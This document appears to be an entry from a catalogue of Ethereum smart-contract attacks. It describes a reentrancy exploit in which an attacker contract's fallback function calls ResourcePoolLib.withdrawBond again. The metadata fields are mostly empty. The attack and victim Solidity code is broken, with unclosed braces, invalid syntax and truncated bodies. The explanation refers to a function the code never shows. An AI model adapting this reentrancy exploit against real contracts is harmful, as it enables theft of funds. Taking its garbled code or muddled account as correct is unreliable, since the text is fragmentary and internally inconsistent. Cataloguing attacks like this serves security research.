Attack 16ΒΆ

Contract Name


Contract Address


Transaction Count


Invovled Ethers

0.94 Ethers

Length of the Call Chain

1 external function

Victim Function


Attack Mechanisim

Attack code:

contract Attack is UacCrowdsale{
    ResourcePoolLib r = new ResourcePoolLib();

    constructor() payable {}

    function startAttack() public {
        r.withdrawBond(pool this, 10, 10);

    function() payable {
        r.withdrawBond(pool this, 10, 10);

    function getvalue() returns (uint) {
        return this.balance;

Attacked code:

contract ResourcePoolLib {
    function withdrawBond(Pool storage self, address resourceAddress, uint value, uint minimumBond) public {
        if (value > self.bonds[resourceAddress]) {

        if (isInPool(self, resourceAddress)) {
            if (self.bonds[resourceAddress] - value < minimumBond) {

        deductFromBond(self, resourceAddress, value);

        if (!resourceAddress.send(value)) {
            if (! {

In this case, the attacker can lauch reentrancy attack by calling crowdsale.mintReservationTokens(to, amount). The attacker firstly resets the address variable crowdsale. Then he can call victim function withdrawBond to start attack. The transaction destination is already modified, so the external call is controled by attacker. He can point this call back to the victim function withdrawBond and form a call-loop easily.

Attack. The attacker call startAttack to start attack.